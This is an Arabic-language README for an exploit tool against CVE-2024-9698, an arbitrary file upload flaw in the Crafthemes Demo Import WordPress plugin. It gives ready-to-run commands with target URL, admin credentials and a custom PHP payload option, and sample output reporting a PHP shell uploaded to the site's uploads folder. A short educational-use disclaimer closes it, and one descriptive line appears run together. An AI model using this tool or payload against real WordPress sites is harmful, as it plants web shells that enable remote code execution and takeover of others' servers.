
Crafthemes Demo Import <= 3.3 - مصادق عليه ( مسؤول+ ) رفع ملف عشوائي في process_uploaded_files
يستهدف هذا الاستغلال ثغرة حرجة (CVE-2024-9698) في البرنامج المساعد Crafthemes Demo Import لووردبريس. تسمح الثغرة للمسؤولين المُوثقين برفع ملفات عشوائية إلى موقع ووردبريس المتأثر، مما يؤدي إلى احتمالية تنفيذ أوامر عن بُعد (RCE).
process_uploaded_filesreadme.txt.admin-ajax.php لرفع غلاف PHP مخصص.python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password"
إذا كنت ترغب في رفع حمولة PHP مخصصة، استخدم:
python CVE-2024-9698.py --url "http://target.com/wordpress" --username "admin" --password "password" --payload "<?php phpinfo(); ?>"
[+] Target is vulnerable, proceeding with exploit...
[+] Logged in successfully.
[+] Extracted nonce: abc123xyz
[+] Shell uploaded successfully: http://target.com/wp-content/uploads/2025/02/Nxploit.php
إخلاء مسؤولية: هذا السكريبت مخصص لأغراض التعليم والبحث الأمني فقط. الاستخدام غير المصرح به ضد الأنظمة دون إذن صريح غير قانوني.